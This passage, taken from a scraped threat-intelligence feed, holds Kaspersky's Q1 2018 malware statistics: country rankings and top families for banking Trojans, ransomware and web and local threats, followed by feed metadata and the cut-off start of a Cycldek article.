As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \n* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 28.0% \n2 | Nymaim | Trojan.Win32.Nymaim | 20.3% \n3 | Caphaw | Backdoor.Win32.Caphaw | 15.2% \n4 | SpyEye | Backdoor.Win32.SpyEye | 11.9% \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% \n6 | Emotet | Backdoor.Win32.Emotet | 2.4% \n7 | Neurevt | Trojan.Win32.Neurevt | 2.3% \n8 | Shiz | Backdoor.Win32.Shiz | 2.1% \n9 | Gozi | Trojan.Win32.Gozi | 1.9% \n10 | ZAccess | Backdoor.Win32.ZAccess | 1.3% \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly as their activity grew in Q1.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. 
In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affiliate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. 
The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. 
Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. 
Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112 **attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). 
Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). 
\n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "cvss3": {}, "published": "2018-05-14T10:00:30", "type": "securelist", "title": "IT threat evolution Q1 2018. 
Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "modified": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-03T11:50:54", "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog